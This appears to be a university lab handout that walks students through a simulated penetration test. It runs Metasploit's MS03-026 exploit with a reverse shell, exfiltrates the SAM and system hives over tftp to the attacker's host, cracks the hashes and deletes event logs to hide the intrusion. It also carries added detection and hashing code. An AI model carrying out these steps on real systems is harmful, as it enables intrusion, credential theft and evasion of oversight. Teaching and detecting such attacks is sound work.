IST 451, Capstone Lab 1
Lab Exercise – Penetration Testing – Offense
Objectives
In this lab you will complete the following tasks:
· Learn how an attacker breaks into a system.
· Discover, penetrate, and exploit a network.
· Participate in a multi-team game to attack a network.
Visual Objective
Introduction
Penetration testing is a method of evaluating the security of a computer system or network by simulating an attack by a cracker. A “cracker” is the term used for any malicious hacker, one who attempts to break into a system for personal gain. The best way for a company to find out about its security vulnerabilities is through a penetration test, rather than after an attack.
Working in the security field, you may be asked to perform penetration tests by your company. These tests usually have very structured reports, but the method of hacking is open to interpretation. Because hacking is illegal, it is extremely important that all consent forms have been signed and the people involved have been notified. Without the forms, you could face jail time as well as hefty fines.
Penetration testing uses the following steps:
- Information Gathering
- Penetration
- Foothold
- Privilege Escalation
- Stealth
- Network Penetration
These steps are just a way to explain the progression of an attack and are more of a guideline than an actual process.
The tasks in this lab are as follows:
Task 1
· Information Gathering
Task 2
· Penetration
Task 3
· Foothold
Task 4
· Privilege Escalation
Task 5
· Stealth
Incorporated in the Defense and Offensive Penetration Testing labs is a hacking game, which will test your skills learned throughout the semester against another team.
Rules of the Game
1) The game is won when either the Offense team breaks in and grabs the file socialsecurity.txt or the Defense team prevents the other team from taking their file in the time allotted.
2) The time limit for Defense setup is 30 minutes. You may patch and stop applications at this time, but all critical applications must be running when the attack begins.
3) The time limit for Offense attack is 30 minutes.
4) After the 30 minutes is up, the two teams must switch roles and replay the game.
5) You may not use any knowledge of the attacks gained in the attacking role. Be aware that the attacking team may use other techniques than what is provided in the attack document!
6) You may not move the file socialsecurity.txt.
7) Defense will start first, and after 30 minutes the Offense team may start (or whenever Defense is finished with task 4). During Offense, the Defense team may perform Task 5 Intrusion Response, but the Defense team can never stop any applications (e.g., for patching purposes) longer than 5 seconds.
Scenario: Bank of IST Penetration Test
You have been tasked by Bank of IST to perform a penetration test on their internal and external network security. The consent forms have been signed and all other relevant documentation has been filled out. Your team will be acting as a “blue team,” which is a penetration test done with the entire network and security teams aware of it. A “red team” is a penetration test done with only a few people in the company knowing about it. The advantage of a red team is that it better simulates an attack since the security departments will have no time to prepare for the intrusion. However, it will provide a better environment in this lab to allow for preparations by each team.
Task 1 – Information Gathering
In this task you will discover more information about Bank of IST. The best source of information about a company is located on the Internet. In addition, you will learn how to port scan and analyze the results.
Be sure to include screenshots of important steps to include in your report.
Step 1: You will be penetrating the website first because it is the only external part of the company.
- Click on the terminal icon.
- In the command prompt window, type “ping 201.205.84.19” (we are using the IP address here for simplicity; usually it will be www.something.com).
- Replies from the IP address should be returned to you.
Step 2: Now that you have some information on the web server, and its IP address, you can begin scanning its ports for vulnerabilities.
- Click on the K menu and navigate to BackTrack Utilities -> Enumeration -> Scanning -> NmapFE.
- Nmap should open and display several options. Nmap is one of the most used tools by hackers and security professionals alike. It scans servers for open ports, and can display important OS information as well.
- Click on the window and type the IP address of the server into it. Also click on “version probe,” “SYN stealth,” and “OS version.” Then click “Scan.”
- Results should be returned to you. Make sure you save the results in a text file; you do not want to scan again (in case they have an intrusion detection system which could detect it). It takes some time for the scan to complete, so be patient.
Step 3: With the results from the scan, you have a wealth of information about the server. Take a look at what ports are open.
Your next goal will be to find any vulnerabilities that deal with those services or the operating system. Use the resources listed at the end of this document to help you get your answer. Do not proceed to the next part until you have the list of vulnerabilities!
Task 2 – Penetration
In this task you will learn how to penetrate the target server.
Be sure to include screenshots of important steps to include in your report.
Step 1: Now that you have a list of vulnerabilities to try, an attempt can be made to break into the server. In the interest of time, you will only be attempting the FTP vulnerability. Open Metasploit from K -> BackTrack Utilities -> Exploit Archives -> Metasploit framework -> MsfWeb.
Step 2: Open the web browser (lower left part of the screen) and type 127.0.0.1:55555.
Step 3: When Metasploit starts, click “Filter Modules” and set it to OS: WinXP (Pro). Scroll down to “Microsoft RPC DCOM MS03-026 exploit” and click on it.
Step 4: Click Target “0”
Step 5: For payload, select “Win32_reverse_stg.” This is a reverse shell, which will give you command line access to the server if it succeeds.
Step 6: To configure the exploit, use the following option:
RHost: 201.205.84.19
Click exploit when finished, and wait a moment.
Step 7: Click OK when the server connection pop-up appears. Scroll down and click on the link to “Session x” at the bottom of the screen. You will then be in a command prompt environment on the web server!
Task 3 - Foothold
Be sure to include screenshots of important steps to include in your report.
Step 1: The next goal is to grab the password hash from the server and return it to your system. To do this, you must get the syskey and sam files. However, Windows prevents access to those files while it is running. The alternative is to try the repair directory, where Windows stores files that can help restore the system in case of a failure.
Type “cd %SYSTEMROOT%\repair” into the command prompt.
Step 2: Type “dir”. This will list the contents of the directory you are currently in. It should show the sam and system (syskey) files.
Step 3: To retrieve the sam and system files, you will have to send them via the command line and reverse FTP to your system. First, ensure the TFTP server is running. Go to K -> Backtrack Services -> TFTPD -> Start TFTPD.
Step 4: To obtain the files, in the command prompt type “tftp -i 192.168.1.4 PUT system” (this grabs the system file).
Next, grab the sam file: “tftp -i 192.168.1.4 PUT sam”
What these commands did was open a tftp connection to your own system and send the files to it.
Step 5: Open a terminal and type “cd /tmp”. This will put you in the directory where the password files were stored.
Step 6: To extract the syskey, you will be using a utility called bkhive. Type “bkhive system saved-syskey.txt” This will save the syskey into a file called “saved-syskey.txt”
Step 7: To extract the password hash into a text file, you will need to do the following:
Type “samdump2 sam saved-syskey.txt > pwhash.txt”
This command uses the utility samdump2 to extract the Windows password hashes from the sam file using the syskey you recovered in Step 6, and then puts them in a text file.
Verify that the step worked by typing “nano pwhash.txt” It should show 3 hashes and usernames. Press Ctrl+X to exit.
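From the defender's side, the transfer in Steps 3 and 4 is a concrete detection opportunity: a tftp PUT of the sam or system hive from a server is almost never legitimate. The following is an added example, not part of the lab handout, that flags such commands in constructed process-creation records (the host|user|command-line record format is an assumption).

```python
import re
from dataclasses import dataclass

# Constructed process-creation records in a hypothetical "host|user|command line" format;
# they are not from any real system and only mirror the commands used in this task.
SAMPLE_LOGS = [
    "websrv|SYSTEM|cmd.exe /c dir",
    "websrv|SYSTEM|tftp -i 192.168.1.4 PUT system",
    "websrv|SYSTEM|tftp -i 192.168.1.4 PUT sam",
    "websrv|alice|tftp 10.0.0.5 GET boot.bin",
    "websrv|bob|tftp.exe -i 10.0.0.5 put C:\\WINDOWS\\repair\\security",
    "websrv|bob|tftp -i 10.0.0.5 put report.txt",
]

# Registry hives holding Windows account secrets; the lab exfiltrates sam and system.
CREDENTIAL_HIVES = {"sam", "system", "security"}

# tftp [-i] <host> PUT|GET <source> [<destination>]  (Windows tftp.exe syntax)
TFTP_RE = re.compile(
    r"^\s*tftp(?:\.exe)?\s+(?:-\S+\s+)*(?P<host>\S+)\s+(?P<verb>put|get)\s+(?P<src>\S+)",
    re.IGNORECASE,
)

@dataclass(frozen=True)
class Alert:
    host: str
    user: str
    dest: str
    file: str
    severity: str

def classify(host: str, user: str, cmdline: str):
    """Return an Alert for an outbound TFTP transfer, or None for anything else."""
    m = TFTP_RE.match(cmdline)
    if not m or m["verb"].lower() != "put":
        return None
    # Compare only the file name, so "C:\WINDOWS\repair\sam" and "sam" are treated alike.
    name = m["src"].replace("\\", "/").rsplit("/", 1)[-1].lower()
    severity = "high" if name in CREDENTIAL_HIVES else "medium"
    return Alert(host, user, m["host"], name, severity)

def scan(lines):
    """Parse each record and collect the alerts; malformed records are skipped."""
    alerts = []
    for line in lines:
        parts = line.split("|", 2)
        if len(parts) != 3:
            continue
        alert = classify(*parts)
        if alert:
            alerts.append(alert)
    return alerts
```

Any high-severity hit here should also be correlated with file reads under %SYSTEMROOT%\repair, since the hive copies there are the ones an attacker can read while Windows is running.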
Step 8: To crack the passwords, we are going to use an emerging technique for password cracking called Rainbow Tables. A rainbow table is a generated hash set which simply contains all passwords of a certain length hashed. The beauty of this is that a password of any complexity (letters, numbers, special characters) can be quickly found by simply doing a find on the hash given to it. So if the hash was 34$#@434@32, and the database has the same hash, it simply returns the original value that generated it.
Copy pwhash.txt to a thumb drive by typing “cp pwhash.txt /mnt/sdb1_removable”
Step 9: Go to a lab computer and put the thumb drive into the system. Go to the website www.plain-text.info (a site which has rainbow tables online). Click “Add Hashes” and copy the entire line from the “Administrator:” section and paste it into the hash section. Choose “lm” for the algorithm and type the security code. The next screen should show the password value at the top.
Write down the password and include it in your report.
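To show why the lookup approach in Step 8 works against an unsalted hash such as LM, and why a per-account salt defeats it, here is an added toy example that is not part of the lab handout; it uses MD5 over a three-character password space as a stand-in for LM, and a plain precomputed dictionary rather than the chained time-memory trade-off a real rainbow table uses.

```python
import hashlib
import itertools
import os
import string

# Toy password space: lowercase letters and digits, fixed length 3 (36**3 = 46,656 entries).
# Real tables cover far larger spaces; this is a constructed miniature of the same idea.
CHARSET = string.ascii_lowercase + string.digits
LENGTH = 3

def unsalted_hash(password: str) -> str:
    """Stand-in for an unsalted password hash (LM in the lab); MD5 is only an illustration."""
    return hashlib.md5(password.encode()).hexdigest()

def salted_hash(password: str, salt: bytes) -> str:
    """Same digest, but a per-account random salt is mixed in before hashing."""
    return hashlib.md5(salt + password.encode()).hexdigest()

def build_lookup_table(hash_fn=unsalted_hash) -> dict:
    """Precompute digest -> password for every password in the space (the 'generated hash set')."""
    return {hash_fn("".join(c)): "".join(c) for c in itertools.product(CHARSET, repeat=LENGTH)}

def lookup(table: dict, digest: str):
    """One dictionary lookup reverses any hash in the table, whatever characters the password used."""
    return table.get(digest)

def demo():
    """Unsalted hash: recovered instantly. Salted hash: not in the table.
    With an 8-byte salt, an attacker would need a separate table for each of 2**64 salt values."""
    table = build_lookup_table()
    stolen_unsalted = unsalted_hash("q7z")
    stolen_salted = salted_hash("q7z", os.urandom(8))
    return lookup(table, stolen_unsalted), lookup(table, stolen_salted)
```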
Task 4 – Privilege Escalation/Stealth
Be sure to include screenshots of important steps to include in your report.
Since you have cracked the administrator password, there is no need to escalate your privileges. However, it is extremely important that the logs are erased so an administrator doesn’t realize you are there.
Step 1: First, connect to the server using remote desktop. Open the client by going to
K -> Internet -> Remote Desktop Client.
Step 2: Type “201.205.84.19” into the host section, and when login screen appears, use the administrator account and password you cracked to get inside.
Step 3: Delete the logs by opening Start -> Control Panel -> Windows administrative tools and clicking on “Logs”. Click on “Delete all logs.” This will prevent any administrators from knowing that you have entered the system.
Task 5 – Get the file “socialsecurity.txt”
The goal of this final task is to use the foothold you have created to capture the file “socialsecurity.txt” on the web server.
Use any means necessary to break in remotely and capture the file.
Appendix I – Web Resources
· National Vulnerability Database: http://nvd.nist.gov/
· MilW0rm (exploit database): http://www.milw0rm.com/
· Online Rainbow Tables: http://plain-text.info/
· Metasploit Project Exploit List: http://www.metasploit.com/projects/Framework/exploits.html
Report to deliver:
The group report is to show what you did in the project. Please clearly state your results of this project. You are expected to hand in a report in the following formats:
· A cover page (including project title) with group name and group members
· A table of contents with page numbers
· Double-spaced typing for convenient grading
· Hard copies only, Font size 12, Single column
· A bound or stapled document, with numbered pages
The report should have the following sections. Each section has multiple items. You need to write a report section by section that covers all required items. But you do not have to write the report item by item. Take screenshots if it is necessary.
Section I: Introduction:
You should have the following parts:
· Describe the goal and motivation of this project. In addition to what has been stated in the project instruction, please tell your own expectation in this project.
· Give an outline of this report, in which the content of each section needs to be briefly described.
Section II: Task 1
You should have the following parts:
· Briefly describe the concept of a penetration test. Why is this test important for a company?
· What is the purpose of the Nmap tool?
· What is the purpose of researching the company instead of going directly to Nmap?
· How many vulnerabilities did you find on the web sites? Did anything about this surprise you?
Section III: Task 2
You should have the following parts:
· Briefly describe the functionality of the Metasploit Framework.
· Were you successful in breaking into the server the first time? Why or why not?
· What other ways can you penetrate a system besides using Metasploit?
Section IV: Task 3
You should have the following parts:
· What is reverse FTP and why did you use it in this situation?
· Briefly describe the purpose of the foothold step.
Section V: Task 4